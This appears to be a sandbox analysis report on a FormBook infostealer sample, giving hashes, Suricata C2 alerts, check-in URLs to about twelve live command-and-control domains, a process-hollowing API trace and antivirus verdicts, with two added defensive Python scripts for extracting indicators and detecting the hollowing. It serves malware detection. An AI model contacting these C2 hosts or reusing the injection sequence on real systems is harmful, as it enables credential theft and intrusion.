Summary | ZeroBOX

csrss.exe

Tags: Malicious Library, UPX, OS Processor Check, PE32, PE File
Category FILE
Machine s1_win7_x6401
Started Dec. 10, 2022, 2:44 p.m.
Completed Dec. 10, 2022, 2:47 p.m.
Size 332.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5 0a3a7cba003467f2d1976ba842d155dc
SHA256 856e9dc2812c572a9023f02503c471addbf8a82be5aed8454cc6254f899caccb
CRC32 7AF935BC
ssdeep 6144:9kwvbmtv3a9uj5joIvbmcZwd4535p3pkRC9XrtDgwLKTqSVN3DhMggWnC:7qtPaQNjjZc453Lp0KXpfLK+SVN3tHLC
Yara
  • IsPE32 - (no description)
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49182 -> 66.29.151.40:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49182 -> 66.29.151.40:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 155.159.61.221:80 -> 192.168.56.101:49177 2400012 ET DROP Spamhaus DROP Listed Traffic Inbound group 13 Misc Attack
TCP 192.168.56.101:49182 -> 66.29.151.40:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 155.159.61.221:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 2.57.90.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 155.159.61.221:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 2.57.90.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49177 -> 155.159.61.221:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49178 -> 2.57.90.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 192.185.35.86:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 192.185.35.86:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49179 -> 192.185.35.86:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 2.57.90.16:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 195.24.68.23:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 195.24.68.23:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49181 -> 195.24.68.23:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 2.57.90.16:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49184 -> 2.57.90.16:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 192.185.217.47:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 162.214.129.149:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 192.185.217.47:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 162.214.129.149:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49168 -> 192.185.217.47:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49176 -> 162.214.129.149:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 206.233.197.135:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 206.233.197.135:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49175 -> 206.233.197.135:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 66.29.141.188:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 66.29.141.188:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49185 -> 66.29.141.188:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 154.22.100.62:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 154.22.100.62:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49180 -> 154.22.100.62:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 162.0.238.93:80 2031412 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 162.0.238.93:80 2031449 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected
TCP 192.168.56.101:49183 -> 162.0.238.93:80 2031453 ET MALWARE FormBook CnC Checkin (GET) Malware Command and Control Activity Detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .ndata
suspicious_features GET method with no useragent header suspicious_request GET http://www.eufidelizo.com/henz/?nbWl8n=wcp3urA+/rGtUuNVdzf16ZeZGpZq4XGXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqWKQvjoVWw+U5Y7ODGkonKNL7W0=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.lyonfinancialusa.com/henz/?nbWl8n=I97X75yj3reE70KD0H/Cak1oo2zHy9G/KKFZ2xPoakAfOE75REIsiEdUspxqeb3/DlFpoh36cAjqvl85DwXllB7WLme1uHpNnCumkME=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.afterdarksocial.club/henz/?nbWl8n=8TptbrIX6F4NxrWdTnVKCiNdtmXGEuELv5cUeaX5N5UPFd9Hxy/eCwrx8CSqMIuqYtp16J6ah9tFi3/97BblSlVnUMukTQJmI59ItyY=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.patrickguarte.com/henz/?nbWl8n=5p9Ov6C7qce51hIp6nkbqV/d59cDddN77lLEFw6Ufibk2yN56suGmW9SnR2oT5DaW1POG/xMOeVc/Muqlx89dGklgcJInIpBk29/OFI=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.brennancorps.info/henz/?nbWl8n=P4ST2IJPckjMYpRf2hTG7XGyBDGAy7OOggEf6mHPhnME1yGBMW0exDItYRA37f+XnLyPH15dACF6dKWBGe8FrnsbvwR+k5hXy5NlDxw=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.lopezmodeling.com/henz/?nbWl8n=dpH6BKfQQ0cm5ImeofuKRskABJrBNfLp0vSyI4bn1RZjePkdeS9a/FiQgEdxlvmzsB0l+sQcpRgj8HqvSEXtkBUtM/7b2ek1qpGMuFI=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.foxwhistle.com/henz/?nbWl8n=jIhXpQA4pSG2yYWBbTjo4KjMDsvsQ9F5uiLrR0YNz1ez7r/FQUV2XPmUrykxRWDvkt62w03aCUUodajM6m+91s+tfqSr6z5AiriQQhU=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.phootka.ru/henz/?nbWl8n=w1bwPjtuf2ZlKfJJwO+BTMATo3IZhxYr0xwxA7aVeAjkl5kFf+SBsbPh/8ORAg46rPRxP2SAJydpY5hX47JJGDyZCrebhSML6UzwAv0=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.courdak.info/henz/?nbWl8n=vdyVzLcxoZUoogW6+NKMfwQ5LAGTMZCWuq0zGM5B+O39UoDsvg/hobD3JDgVlVzjVFZes90R2RhtZev/AI+f5OQ7oLMklDSyOnM4EYU=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.automotiveparts-store.com/henz/?nbWl8n=l755dn3SV1HJ85bgdYLXX0FitE0O++oBuxO/p/rOD3cyNdqLfUPJLAMkl1O9xhY/fGSw1luYDYlS6H/677nep41+QBgryFqg6K8ooWg=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.seufi.com/henz/?nbWl8n=IBGzHMg16oJNSPrzw250+MvRfpuZJ+UNeLGkgBGOsROhXn3QAnT7j8xX9Jlog+RFk3dGiXHpM08k153fm/VBkqw4m0Htf2ZTok+naIQ=&D8cH=NdndsZxX
suspicious_features GET method with no useragent header suspicious_request GET http://www.youandmegb136.shop/henz/?nbWl8n=UtZym1qImX06+GpDcpN9/2+kdchdxBnkrVUZumUi1jx9tPAiXeTjhhssvsimU8yI7A/xS1pJIIlTb23usgwKY3ermdd4E2Ie0oOK+14=&D8cH=NdndsZxX
request GET http://www.eufidelizo.com/henz/?nbWl8n=wcp3urA+/rGtUuNVdzf16ZeZGpZq4XGXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqWKQvjoVWw+U5Y7ODGkonKNL7W0=&D8cH=NdndsZxX
request GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip
request GET http://www.sqlite.org/2017/sqlite-dll-win32-x86-3160000.zip
request GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3320000.zip
request GET http://www.sqlite.org/2020/sqlite-dll-win32-x86-3330000.zip
request GET http://www.lyonfinancialusa.com/henz/?nbWl8n=I97X75yj3reE70KD0H/Cak1oo2zHy9G/KKFZ2xPoakAfOE75REIsiEdUspxqeb3/DlFpoh36cAjqvl85DwXllB7WLme1uHpNnCumkME=&D8cH=NdndsZxX
request GET http://www.afterdarksocial.club/henz/?nbWl8n=8TptbrIX6F4NxrWdTnVKCiNdtmXGEuELv5cUeaX5N5UPFd9Hxy/eCwrx8CSqMIuqYtp16J6ah9tFi3/97BblSlVnUMukTQJmI59ItyY=&D8cH=NdndsZxX
request GET http://www.patrickguarte.com/henz/?nbWl8n=5p9Ov6C7qce51hIp6nkbqV/d59cDddN77lLEFw6Ufibk2yN56suGmW9SnR2oT5DaW1POG/xMOeVc/Muqlx89dGklgcJInIpBk29/OFI=&D8cH=NdndsZxX
request GET http://www.brennancorps.info/henz/?nbWl8n=P4ST2IJPckjMYpRf2hTG7XGyBDGAy7OOggEf6mHPhnME1yGBMW0exDItYRA37f+XnLyPH15dACF6dKWBGe8FrnsbvwR+k5hXy5NlDxw=&D8cH=NdndsZxX
request GET http://www.lopezmodeling.com/henz/?nbWl8n=dpH6BKfQQ0cm5ImeofuKRskABJrBNfLp0vSyI4bn1RZjePkdeS9a/FiQgEdxlvmzsB0l+sQcpRgj8HqvSEXtkBUtM/7b2ek1qpGMuFI=&D8cH=NdndsZxX
request GET http://www.foxwhistle.com/henz/?nbWl8n=jIhXpQA4pSG2yYWBbTjo4KjMDsvsQ9F5uiLrR0YNz1ez7r/FQUV2XPmUrykxRWDvkt62w03aCUUodajM6m+91s+tfqSr6z5AiriQQhU=&D8cH=NdndsZxX
request GET http://www.phootka.ru/henz/?nbWl8n=w1bwPjtuf2ZlKfJJwO+BTMATo3IZhxYr0xwxA7aVeAjkl5kFf+SBsbPh/8ORAg46rPRxP2SAJydpY5hX47JJGDyZCrebhSML6UzwAv0=&D8cH=NdndsZxX
request GET http://www.courdak.info/henz/?nbWl8n=vdyVzLcxoZUoogW6+NKMfwQ5LAGTMZCWuq0zGM5B+O39UoDsvg/hobD3JDgVlVzjVFZes90R2RhtZev/AI+f5OQ7oLMklDSyOnM4EYU=&D8cH=NdndsZxX
request GET http://www.automotiveparts-store.com/henz/?nbWl8n=l755dn3SV1HJ85bgdYLXX0FitE0O++oBuxO/p/rOD3cyNdqLfUPJLAMkl1O9xhY/fGSw1luYDYlS6H/677nep41+QBgryFqg6K8ooWg=&D8cH=NdndsZxX
request GET http://www.seufi.com/henz/?nbWl8n=IBGzHMg16oJNSPrzw250+MvRfpuZJ+UNeLGkgBGOsROhXn3QAnT7j8xX9Jlog+RFk3dGiXHpM08k153fm/VBkqw4m0Htf2ZTok+naIQ=&D8cH=NdndsZxX
request GET http://www.youandmegb136.shop/henz/?nbWl8n=UtZym1qImX06+GpDcpN9/2+kdchdxBnkrVUZumUi1jx9tPAiXeTjhhssvsimU8yI7A/xS1pJIIlTb23usgwKY3ermdd4E2Ie0oOK+14=&D8cH=NdndsZxX
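The request log above has a clear shape: every check-in is a GET with no User-Agent to a one-level directory (/henz/) carrying one long base64-like value and one short constant (D8cH=NdndsZxX), while the www.sqlite.org fetches are ordinary file downloads. The script below is an added example for this write-up, not ZeroBOX output or FormBook code; it pulls the C2 hosts out of raw "request GET ..." lines and separates them from the other traffic. The sample lines are copied from the report (a constructed subset), and the length threshold and path shape it checks for are this example's own assumptions, not a published signature. The sqlite.org downloads are kept apart deliberately: together with the Chrome User Data path listed later in the report they are consistent with browser credential-store parsing, but that is an inference, not something the trace proves.

```python
"""Pull C2 indicators out of the sandbox HTTP log shown above.

Added example for this write-up, not ZeroBOX output or FormBook code. The
request lines below are copied from the report (constructed sample set); the
thresholds (PARAM_MIN, the one-level directory shape) are this example's own
assumptions rather than a published FormBook signature.
"""
import re
from urllib.parse import urlsplit

# Constructed sample: a subset of the "request GET ..." lines from the report.
REQUEST_LINES = """\
request GET http://www.eufidelizo.com/henz/?nbWl8n=wcp3urA+/rGtUuNVdzf16ZeZGpZq4XGXlvUWG7FdGjeYGPzd5j/gkjEzvi43j/MvxviINYayZJCRqWKQvjoVWw+U5Y7ODGkonKNL7W0=&D8cH=NdndsZxX
request GET http://www.sqlite.org/2021/sqlite-dll-win32-x86-3350000.zip
request GET http://www.sqlite.org/2022/sqlite-dll-win32-x86-3370000.zip
request GET http://www.lyonfinancialusa.com/henz/?nbWl8n=I97X75yj3reE70KD0H/Cak1oo2zHy9G/KKFZ2xPoakAfOE75REIsiEdUspxqeb3/DlFpoh36cAjqvl85DwXllB7WLme1uHpNnCumkME=&D8cH=NdndsZxX
request GET http://www.phootka.ru/henz/?nbWl8n=w1bwPjtuf2ZlKfJJwO+BTMATo3IZhxYr0xwxA7aVeAjkl5kFf+SBsbPh/8ORAg46rPRxP2SAJydpY5hX47JJGDyZCrebhSML6UzwAv0=&D8cH=NdndsZxX
request GET http://www.youandmegb136.shop/henz/?nbWl8n=UtZym1qImX06+GpDcpN9/2+kdchdxBnkrVUZumUi1jx9tPAiXeTjhhssvsimU8yI7A/xS1pJIIlTb23usgwKY3ermdd4E2Ie0oOK+14=&D8cH=NdndsZxX
""".splitlines()

PARAM_MIN = 64  # assumption: the encrypted blob is far longer than a normal query value
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def split_query(query):
    """Split a query string by hand: urllib's parse_qs turns '+' into a space,
    which would corrupt base64 values that carry '+' and '/' unencoded."""
    pairs = []
    for part in query.split("&"):
        if not part:
            continue
        key, _, value = part.partition("=")
        pairs.append((key, value))
    return pairs


def parse_request_line(line):
    """'request GET http://host/path?query' -> dict, or None for any other line."""
    m = re.match(r"^request\s+(\w+)\s+(\S+)$", line.strip())
    if not m:
        return None
    method, url = m.groups()
    parts = urlsplit(url)
    return {"method": method, "host": parts.hostname, "path": parts.path,
            "params": split_query(parts.query)}


def looks_like_checkin(rec):
    """Heuristic for the check-in shape in the report: GET, a single one-level
    directory, exactly one long base64-looking value plus one short constant."""
    if rec["method"] != "GET" or len(rec["params"]) != 2:
        return False
    if not re.fullmatch(r"/[A-Za-z0-9]+/", rec["path"]):
        return False
    long_vals = [v for _, v in rec["params"] if len(v) >= PARAM_MIN and BASE64ISH.match(v)]
    short_vals = [v for _, v in rec["params"] if len(v) < PARAM_MIN]
    return len(long_vals) == 1 and len(short_vals) == 1


def extract_iocs(lines):
    """Return (c2 hosts in first-seen order, host -> (path, short constant), other hosts)."""
    c2_hosts, other_hosts, campaign = [], [], {}
    for line in lines:
        rec = parse_request_line(line)
        if rec is None:
            continue
        if looks_like_checkin(rec):
            if rec["host"] not in c2_hosts:
                c2_hosts.append(rec["host"])
            # the short constant pair is what ties the hosts to one build/campaign
            short = [(k, v) for k, v in rec["params"] if len(v) < PARAM_MIN][0]
            campaign[rec["host"]] = (rec["path"], short)
        elif rec["host"] not in other_hosts:
            other_hosts.append(rec["host"])
    return c2_hosts, campaign, other_hosts


if __name__ == "__main__":
    c2, keys, other = extract_iocs(REQUEST_LINES)
    print("C2 hosts:", *c2, sep="\n  ")
    print("shared path/constant:", set(keys.values()))
    print("non-C2 hosts:", other)
```

Run against the full request list from the report, the same code yields twelve C2 hosts that all share /henz/ and D8cH=NdndsZxX; block the hosts, but also hunt on the path-plus-constant pair, which survives the domain rotation that the twelve different hostnames show.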
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 4001792
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2644
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x020d0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2688
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 188416
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00401000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2688
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00950000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 3158016
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02080000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Google\Chrome\User Data\
file C:\Users\test22\AppData\Local\Temp\fyjekd.exe
file C:\Users\test22\AppData\Local\Temp\fyjekd.exe
file C:\Users\test22\AppData\Local\Temp\fyjekd.exe
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
Process injection: Process 2644 called NtSetContextThread to modify a thread in remote process 2688. Note that the PAGE_EXECUTE_READWRITE allocations listed above all pass process_handle 0xffffffff, the current-process pseudo-handle, so 2644, 2688 and 2852 were each changing their own address space; the cross-process step the sandbox attributes to 2644 is this thread-context write.
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 1995571652 (0x76f201c4)
registers.esp: 1638384 (0x0018fff0)
registers.edi: 0
registers.eax: 4199088 (0x004012b0, inside the 188416-byte region at 0x00401000 that process 2688 set to PAGE_EXECUTE_READWRITE above; on 32-bit Windows the initial thread's eax holds the start address, so this is consistent with the entry point of a replaced image)
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168 (0x7efde000, the usual PEB location for a 32-bit process on Windows 7)
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000000c8
process_identifier: 2688
1 0 0
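The trace above is the classic hollowing sequence: the child (2688) makes its image at 0x00401000 writable and executable, the parent (2644) looks up SeDebugPrivilege, then rewrites the child's thread context so that eax (the start address on 32-bit Windows) points into that region. The detector below is an added example for this write-up, not ZeroBOX code; the events are constructed from the report's own values, and the tuple layout used for them is this example's assumption about how such a trace might be exported, not the ZeroBOX format. It converts the decimal register dump to hex and fires only when a cross-process NtSetContextThread aims eax at memory the target had just made RWX.

```python
"""Flag the process-hollowing chain recorded in the API trace above.

Added example for this write-up, not ZeroBOX code. EVENTS is constructed from
the report's values (PIDs 2644/2688, the RWX regions, the NtSetContextThread
register dump); the (api, pid, args) layout is this example's assumption about
an exported trace, not the ZeroBOX format. "target_pid" is a hypothetical field
for traces that resolve a foreign process handle; the report never needs it.
"""
PAGE_EXECUTE_READWRITE = 0x40
CURRENT_PROCESS = 0xFFFFFFFF  # GetCurrentProcess() pseudo-handle, as seen in the trace

# Constructed from the report: each event is (api, calling pid, arguments).
EVENTS = [
    ("NtAllocateVirtualMemory", 2644, {"process_handle": 0xFFFFFFFF, "protection": 64,
                                       "base_address": 0x021D0000, "region_size": 4001792}),
    ("NtProtectVirtualMemory", 2688, {"process_handle": 0xFFFFFFFF, "protection": 64,
                                      "base_address": 0x00401000, "length": 188416}),
    ("NtAllocateVirtualMemory", 2688, {"process_handle": 0xFFFFFFFF, "protection": 64,
                                       "base_address": 0x00950000, "region_size": 3158016}),
    ("LookupPrivilegeValueW", 2644, {"privilege_name": "SeDebugPrivilege"}),
    ("NtSetContextThread", 2644, {"process_identifier": 2688, "thread_handle": 0xC8,
                                  "registers.eip": 1995571652, "registers.eax": 4199088,
                                  "registers.ebx": 2130567168, "registers.esp": 1638384}),
]


def to_hex32(value):
    """Sandbox register dumps are decimal; analysts reason in 32-bit hex."""
    return f"0x{value & 0xFFFFFFFF:08x}"


def rwx_regions(events):
    """pid -> list of (start, end) ranges made PAGE_EXECUTE_READWRITE in that process.
    process_handle 0xffffffff means the caller is changing its own memory."""
    regions = {}
    for api, pid, args in events:
        if api not in ("NtAllocateVirtualMemory", "NtProtectVirtualMemory"):
            continue
        if args.get("protection") != PAGE_EXECUTE_READWRITE:
            continue
        if args.get("process_handle") == CURRENT_PROCESS:
            target = pid
        else:
            target = args.get("target_pid", pid)  # hypothetical field, see module docstring
        size = args.get("region_size", args.get("length", 0))
        regions.setdefault(target, []).append((args["base_address"], args["base_address"] + size))
    return regions


def in_regions(addr, ranges):
    return any(lo <= addr < hi for lo, hi in ranges)


def detect_hollowing(events):
    """Alert on NtSetContextThread calls aimed at another process, reporting whether
    the new eax lands in a region that process had made RWX and whether the caller
    had looked up SeDebugPrivilege beforehand."""
    regions = rwx_regions(events)
    debug_priv = {pid for api, pid, a in events
                  if api == "LookupPrivilegeValueW" and a.get("privilege_name") == "SeDebugPrivilege"}
    alerts = []
    for api, pid, args in events:
        if api != "NtSetContextThread":
            continue
        target = args["process_identifier"]
        if target == pid:
            continue  # a process adjusting its own thread is not injection
        eax = args["registers.eax"]
        alerts.append({
            "source_pid": pid,
            "target_pid": target,
            "new_eip": to_hex32(args["registers.eip"]),
            "new_eax": to_hex32(eax),
            "eax_in_target_rwx": in_regions(eax, regions.get(target, [])),
            "source_looked_up_sedebug": pid in debug_priv,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_hollowing(EVENTS):
        print(alert)
```

The eax-in-RWX check is what separates hollowing from benign debugger or CLR activity that also calls NtSetContextThread; a real pipeline would add the NtWriteVirtualMemory or section-mapping step, which this sandbox summary does not list.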
MicroWorld-eScan Gen:Variant.Jaik.77520
Cybereason malicious.c584a2
Cyren W32/Trojan.AIIW-8367
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
APEX Malicious
Kaspersky VHO:Trojan.Win32.FormBook.gen
BitDefender Gen:Variant.Jaik.77520
Avast Win32:Evo-gen [Trj]
Ad-Aware Gen:Variant.Jaik.77520
Emsisoft Gen:Variant.Jaik.77520 (B)
VIPRE Gen:Variant.Jaik.77520
FireEye Gen:Variant.Jaik.77520
GData Gen:Variant.Jaik.77520
Google Detected
MAX malware (ai score=81)
Antiy-AVL Trojan/NSIS.Formbook.a
Arcabit Trojan.Jaik.D12ED0
Microsoft Trojan:Win32/Formbook.AT!MTB
Cynet Malicious (score: 100)
BitDefenderTheta Gen:NN.ZexaF.36106.rqW@aqeHIX
ALYac Gen:Variant.Jaik.77520
Malwarebytes Malware.AI.4239435998
Rising Trojan.Injector!8.C4 (TFE:1:Gm8DD6ShD4R)
Ikarus Trojan.NSIS.Agent
Fortinet W32/Injector.ESIU!tr
AVG Win32:Evo-gen [Trj]
CrowdStrike win/malicious_confidence_90% (D)